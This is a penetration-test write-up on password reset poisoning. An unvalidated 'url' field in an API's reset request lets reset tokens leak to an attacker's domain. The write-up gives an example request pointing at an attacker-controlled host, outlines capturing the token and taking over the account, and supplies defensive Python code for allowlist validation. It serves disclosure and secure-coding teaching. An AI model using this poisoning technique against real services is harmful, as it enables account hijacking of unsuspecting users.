Password Reset Poisoning Leading to Account Takeover

Overview
During a penetration test of a web application's API, I discovered a vulnerability in the password reset functionality that allowed an attacker to intercept reset tokens and take over user accounts. By manipulating a user-controllable field in the password reset POST request, an attacker could make the reset link sent to victims point to an attacker-controlled domain.
Objective
Authenticated testing of the application's API endpoints, focusing on privilege escalation and authentication vulnerabilities.
Discovery
While analysing the password reset endpoint, I observed that the API accepted a JSON payload containing an email field and a url field. The url value was entirely user-controlled and was neither validated nor restricted to trusted domains.
An example of the JSON request body sent to the API looked like this:
{
  "email": "victim@example.com",
  "url": "https://attacker-controlled-domain.com/reset"
}
To test this, I supplied a domain I controlled as the url value in the password reset request (for a quick PoC I used a Python HTTP server to receive the request, but the same can be achieved in several ways, Burp Collaborator for example). When the reset email was sent to the user, the link contained my supplied URL. When the user clicked the link, the reset token was sent to my domain, allowing me to capture it, reset the user's password, and gain full access to their account.
Takeaway
This finding highlights the critical risk of allowing user-controlled URLs in password reset flows without validation. Attackers can poison reset emails to capture tokens and hijack accounts. Ensuring URLs are properly validated or restricted to trusted domains is essential to maintaining secure authentication processes.
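One way to apply that restriction, shown here as an added example rather than code from the tested application or the original write-up: the unsafe builder reproduces the behaviour found, while the hardened version only ever emits a link to an allowlisted host and reports whether the requested host was accepted, so rejected attempts can be logged. The trusted host names and the reset path are constructed for the example.

```python
from typing import Optional, Tuple
from urllib.parse import urlencode, urlsplit, urlunsplit

# Constructed configuration for this example: the only front-end hosts that
# may receive a reset link, and the server-side path of the reset page.
TRUSTED_RESET_HOSTS = {"app.example.com", "staging.example.com"}
DEFAULT_RESET_HOST = "app.example.com"
RESET_PATH = "/reset"


def build_reset_link_unsafe(requested_url: str, token: str) -> str:
    """Behaviour found in the test: the client-supplied url is used as-is,
    so a request carrying an attacker's domain poisons the victim's email."""
    return f"{requested_url}?{urlencode({'token': token})}"


def resolve_reset_host(requested_url: Optional[str]) -> Tuple[str, bool]:
    """Return (host, accepted). The host is always one from the allowlist;
    accepted is False when the request carried a URL that was rejected,
    which is the signal a defender should log and alert on."""
    if not requested_url:
        return DEFAULT_RESET_HOST, True
    parts = urlsplit(requested_url)
    try:
        port = parts.port          # raises ValueError on a malformed port
    except ValueError:
        return DEFAULT_RESET_HOST, False
    host = (parts.hostname or "").lower()
    if parts.scheme != "https":             # reject http://, javascript:, ...
        return DEFAULT_RESET_HOST, False
    if parts.username is not None:          # reject https://trusted@attacker/...
        return DEFAULT_RESET_HOST, False
    if port not in (None, 443):
        return DEFAULT_RESET_HOST, False
    if host not in TRUSTED_RESET_HOSTS:     # exact match, so trusted.x.attacker fails
        return DEFAULT_RESET_HOST, False
    return host, True


def build_reset_link_safe(requested_url: Optional[str], token: str) -> str:
    """Hardened form: the link is rebuilt from allowlisted parts only; the
    client never controls scheme, host, port or path, only which trusted
    host it prefers."""
    host, _accepted = resolve_reset_host(requested_url)
    return urlunsplit(("https", host, RESET_PATH, urlencode({"token": token}), ""))
```

The token itself should still be generated server-side with a cryptographically secure generator and expire quickly; this example only fixes where the link points.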